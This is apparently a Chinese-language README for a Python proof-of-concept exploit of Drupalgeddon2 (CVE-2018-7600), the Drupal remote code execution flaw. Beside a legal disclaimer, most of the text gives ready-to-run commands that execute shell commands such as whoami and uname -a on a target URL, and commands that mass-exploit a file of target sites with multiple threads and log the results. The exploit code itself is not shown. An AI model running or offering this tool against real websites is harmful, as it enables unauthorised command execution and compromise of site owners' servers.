本仓库包含一个基于 Python 的概念验证漏洞利用脚本,针对 Drupal 中的关键远程代码执行漏洞,即 Drupalgeddon2 (CVE-2018-7600)。该脚本仅用于教育目的及安全专业人员在授权渗透测试场景中使用。
此工具仅供合法和道德目的使用。未经所有者明确许可,在任何系统上使用此脚本是非法的。作者和贡献者不对因使用此脚本造成的任何滥用或损害负责。使用风险自负。
requests 库colorama 库git clone <仓库地址>
cd <仓库目录>
pip install -r requirements.txt
pip install requests colorama
该脚本提供了多个命令行参数,用于自定义其执行。
使用默认命令 (whoami) 利用单个目标:
python3 drupalgeddon2.py -t http://example.com
使用自定义命令(例如 ls -la)利用单个目标:
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
从文件中扫描目标列表:
创建一个名为 targets.txt 的文件,每行一个 URL:
http://site1.com
https://site2.org
http://site3.net
然后运行脚本:
python3 drupalgeddon2.py -l targets.txt
使用自定义命令和更多线程扫描列表:
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
将输出保存到日志文件:
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| 参数 | 短形式 | 描述 | 默认值 |
|---|
--target | -t | 单个目标 URL。 | - |
--list | -l | 包含目标 URL 列表的文件路径。 | - |
--command | -c | 要在目标上执行的命令。 | whoami |
--threads | -T | 要使用的并发线程数。 | 5 |
--output | -o | 用于记录输出的文件。 | - |
--timeout | 请求超时时间(秒)。 | 15 |